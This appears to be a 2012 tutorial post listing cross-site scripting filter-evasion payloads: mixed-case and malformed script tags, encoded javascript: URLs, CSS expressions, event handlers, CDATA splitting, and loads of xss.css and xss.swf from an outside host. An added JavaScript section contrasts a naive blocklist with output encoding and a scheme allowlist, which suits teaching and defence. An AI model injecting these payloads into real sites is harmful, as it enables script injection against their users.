Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use tab or newline characters to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be removed)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        original: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        original: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code embedded in an swf

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

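Added example, not from the original post: it runs constructed copies of a few vectors from the list above through a naive case-sensitive blocklist and through contextual HTML output encoding, and adds a scheme allowlist for URL contexts, to show why techniques 1, 5, 6 and 9 defeat the blocklist but not the encoding. The function names are assumptions, not an existing library.

```javascript
// Added example (not from the post). Function names are hypothetical.
// Compares a blocklist filter with output encoding on vectors from the list.

// Naive blocklist: strips literal, lower-case, well-formed <script> blocks.
// Techniques 1 (case) and 5 (separators) above are aimed at exactly this.
function naiveBlocklist(input) {
  return input.replace(/<script\b[^>]*>[\s\S]*?<\/script>/g, "");
}

// Output encoding for an HTML text node: every character that can open a tag,
// attribute or entity is replaced, so no markup can be parsed from the data,
// whatever its case, padding or separators.
function encodeForHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;",
                '"': "&quot;", "'": "&#x27;", "`": "&#x60;" };
  return input.replace(/[&<>"'`]/g, (c) => map[c]);
}

// True if the output still contains something the HTML parser treats as a
// tag open: "<" followed by a letter, "/", "!" or "?".
function containsTagStart(output) {
  return /<[A-Za-z\/!?]/.test(output);
}

// Data that lands in a URL context (src, href, url()) needs more than
// encoding: technique 6 hides "javascript:" behind tabs and newlines, which
// browsers strip. Remove those first, then allowlist the scheme.
function isSafeUrl(url) {
  const cleaned = url.replace(/[\u0000-\u0020]/g, "");
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (!m) return true; // relative URL, no scheme
  const scheme = m[1].toLowerCase();
  return scheme === "http" || scheme === "https";
}

// Constructed inputs copied from the list above, plus one plain baseline.
const samples = [
  "<script>alert(1)</script>",            // baseline the blocklist does catch
  "<sCript>alert('d')</scRipT>",          // 1: mixed case
  '<SCRIPT/SRC="t.js"></SCRIPT>',          // 5: "/" instead of whitespace
  "<body onload=\"alert('onload')\">",    // 9: no script tag at all
];

// Applies a filter to every sample; true means a tag still survives.
function survivors(filter) {
  return samples.map((s) => containsTagStart(filter(s)));
}
```

The blocklist only neutralizes the baseline, while encoding neutralizes all four; the URL check is the separate control needed for the src/href/url() vectors in sections 6 and 14.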